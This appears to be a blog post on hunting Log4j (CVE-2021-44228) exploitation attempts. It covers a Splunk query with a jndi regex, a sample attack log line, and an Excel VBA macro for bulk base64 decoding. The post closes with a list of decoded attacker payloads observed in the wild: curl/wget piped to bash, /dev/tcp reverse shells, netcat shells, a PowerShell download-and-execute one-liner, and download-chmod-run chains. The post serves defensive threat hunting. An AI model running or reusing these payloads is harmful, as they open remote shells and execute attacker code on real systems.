Hunting for Log4j RCE (CVE-2021-44228) using Splunk & Excel

As you are aware, there are new Log4j vuln (CVE-2021-44228) vuln been disclosed and exploited in the wild currently.

So, I’m using Splunk query as below; based from Splunk blog [1] to see if there is attempt to use this vuln/exploit towards our assets:

index=* "${jndi:*" Base64 
| eval _time_UTC = _time - (strptime("2000-01-01 +00:00", "%F %:z") - strptime("2000-01-01 " . strftime(_time,"%:z"), "%F %Z")) 
| eval time_in_UTC = strftime(_time_UTC, "%F %T UTC") 
| rex field=_raw "[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)(?<proto>\w+)(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?(?<rce_dest>[a-zA-Z0-9\.\-\_\$\{\:]+)" 
| rex field=_raw "\/Base64\/(?<string>\S+)}" 
| table time_in_UTC proto rce_dest string sourcetype 

As you can see, there are numbers of attempt observed towards our infra for past 7 days:

The raw event looks something like this:

2021-12-10 19:27:20 X.X.X.X GET /owa/auth/logon.aspx url=https%3a%2f%2fX.X.X.X%2fowa%2f&reason=0&CorrelationID=<empty>;&ClientId=AGS0JSW0AJIUEPWEVZ&cafeReqId=13016af6-7c1b-4e2f-b148-1cc2399d2b08; 443 - X.X.X.X ${jndi:ldap://} https://X.X.X.X/owa/ 200 0 0 0

Using the Splunk query above, it will show you a table formatted data which contains extracted base64 under field named “string“.

The result after we export it from Splunk (opened in Excel) looks like:

If you decode the base64 from the example of raw event above:


It appear to be a curl & wget attempt towards our infra:

(curl -s||wget -q -O-|bash

I’m wondering.. How can I quickly decode all these base64 strings? We not gonna decode it one-by-one aren’t we? There are hundreds or probably thousand of it.

So… We going to leverage Excel & macro (yes. you read it right. MACRO) to automatically decode those base64 strings for us. We going to Excel-Fu out of this data.

The macro code that we’ll be using as below:

Function TextBase64Encode(strText, strCharset)

    Dim arrBytes

    With CreateObject("ADODB.Stream")
        .Type = 2 ' adTypeText
        .Charset = strCharset
        .WriteText strText
        .Position = 0
        .Type = 1 ' adTypeBinary
        arrBytes = .Read
    End With

    With CreateObject("MSXML2.DOMDocument").createElement("tmp")
        .DataType = "bin.base64"
        .nodeTypedValue = arrBytes
        TextBase64Encode = Replace(Replace(.Text, vbCr, ""), vbLf, "")
    End With

End Function

Function TextBase64Decode(strBase64, strCharset)

    Dim arrBinary

    With CreateObject("MSXML2.DOMDocument").createElement("tmp")
        .DataType = "bin.base64"
        .Text = strBase64
        arrBinary = .nodeTypedValue
    End With

    With CreateObject("ADODB.Stream")
        .Type = 1 ' adTypeBinary
        .Write arrBinary
        .Position = 0
        .Type = 2 ' adTypeText
        .Charset = strCharset
        TextBase64Decode = .ReadText
    End With

End Function

To use it, first, we need to open the Splunk result that we exported earlier.

After that, press Alt-F8 to open the macro editor. Create new macro – you can give any name you want. For example, I named it “Base64“:

It will then open a new window. Paste macro code given above inside the editor:

After that, close the editor window. Just leave the Excel open.

Then, create 2 new column in the Excel sheet; column named “ASCII” and “Decoded Base64“:

We need to fill up column “ASCII” with string “ASCII” until end/bottom of your data. Let’s say you have 300 row of data in your Excel, then fill 300 of “ASCII” strings besides it.

Just press Ctrl + Arrow-Down to quickly go to end/bottom of data column. After that, type in string “ASCII” in one of the row and copy it (Ctrl-C). Then, press Ctrl + Shift + Arrow-Up to select from bottom to top. Then paste/Ctrl + V to fill all column with string “ASCII“.

Your Excel will look something like this:

Next, we going to start decoding the base64 strings.

Again, press Ctrl + Arrow-Down to go end of column, and type the formula as below:


Refer example as below:

Then, again, copy column with the formula, Ctrl + Shift + Arrow-Up to select from bottom to top & paste/Ctrl + V the formula into all selected column; under “Decoded Base64“.

That’s it. We have successfully decoded all the base64 strings via Excel.

List of attempt that I’ve observed so far:

(curl || wget -q -O-|bash
(curl -S||wget|bash
/bin/bash -i >& /dev/tcp/
bash -i  >& /dev/tcp/ 0>&1
bash -i >& /dev/tcp/ 0>&1
cmd.exe /c powershell.exe -c Invoke-WebRequest
dig $(whoami)
dig $(whoami)
nc 8888 -e /bin/bash ; curl -o ; chmod +x ./ ;bash ; dig 
powershell -c iex ((New-Object System.Net.WebClient).DownloadString(''))
telnet 443
touch /tmp/pwned
wget;curl -O;chmod 777 aaa;./aaa


Any Comments?

This site uses Akismet to reduce spam. Learn how your comment data is processed.